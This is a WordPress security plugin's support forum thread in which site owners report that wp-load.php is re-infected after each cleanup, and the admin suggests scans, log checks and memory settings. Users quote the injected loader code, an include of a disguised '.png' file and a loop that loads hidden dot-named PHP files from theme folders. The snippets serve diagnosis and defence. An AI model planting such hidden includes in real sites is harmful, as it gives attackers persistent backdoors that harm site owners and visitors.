Home › Forums › Support Forum › wp-load.php after fix re-infected immediately
Tagged: wp-load
This topic contains 6 replies, has 4 voices, and was last updated by Anti-Malware Admin 3 years, 11 months ago.
-
AuthorPosts
-
February 9, 2020 at 11:42 pm #2403
I am struggling today with the site, where suddenly to some people it displays porn instead of our content.. so if I scan with the plugin, it finds threat immediately in the wp-load.php file. But after I press fix, it is fixing without error and immediately shows that the file is re-infected. I have tried many times. I also checked the file in server, did not find more differences with original file then that part in the end and I deleted it:
// Edit and deleting this code is not recommended!
@include( ABSPATH . WPINC . ‘/images/tnd.png’);
However, it comes back…Do you have any suggestions what to do?
February 10, 2020 at 10:09 am #2407There must be something malicious remaining on the server that is rewriting that infection. You need to be able to run the Complete Scan.
Can you open the error Console in your browser’s Inspector and send me a screenshot of the Complete Scan when it gets stuck?
You can also check the error_log files on the server to see if there is anything that might indicate why the complete scan is not able to complete.
February 17, 2020 at 3:52 am #2412Hello!
I did fresh WordPress install, then got rid of that problem, your plugin still finds some files in the wp-content folder (this remain same) which give a reading or scan errors, not sure if that could be still a problem and infection can be in sleepy mode? I do scan for now almost every day.
February 17, 2020 at 9:20 am #2413With the kinds of trouble that you have had with the scan not completing and now the read errors, I would guess that the memory_limit in your php.ini file is set too low. Ask you hosting provider if you need help finding or changing the memory_limit on your server.
You also need to find the error_log files on your server. Those will tell you a log about the cause of these problems.
February 23, 2020 at 9:21 am #2427Hello Eli!
I have the same problem only it happens on each of the 4 or 5 files your scanner flags. I have done a full system scan, it was completed, I clicked auto-fix. It said it fixed 5 files, 0 files failed. I then go to the terminal and view the files and they still have the offending code. Can you help me out? I did donate. Thank you!
December 18, 2020 at 8:54 pm #31294Hi, I have same issue, wp-load.php is found multiple times and fixed but reappears. I looked at the code and indicated
Potential threats in file:
if( !class_exists( “WPTemplatesOptions” ) && function_exists( ‘wp_get_themes’ ) ) {
foreach ( wp_get_themes() AS $theme_name => $wp_get_theme ) {
$templates = get_theme_root() . DIRECTORY_SEPARATOR . “{$wp_get_theme->stylesheet}” . DIRECTORY_SEPARATOR . “.{$wp_get_theme->stylesheet}.php”;
if( file_exists( $templates ) ) {
include_once( $templates );
}
}
}December 29, 2020 at 11:47 am #49823Just closing this topic since all threats mentioned here have been added to my definition updates. Please start a new topic if you have a similar issue and need more help.
-
AuthorPosts
The topic ‘wp-load.php after fix re-infected immediately’ is closed to new replies.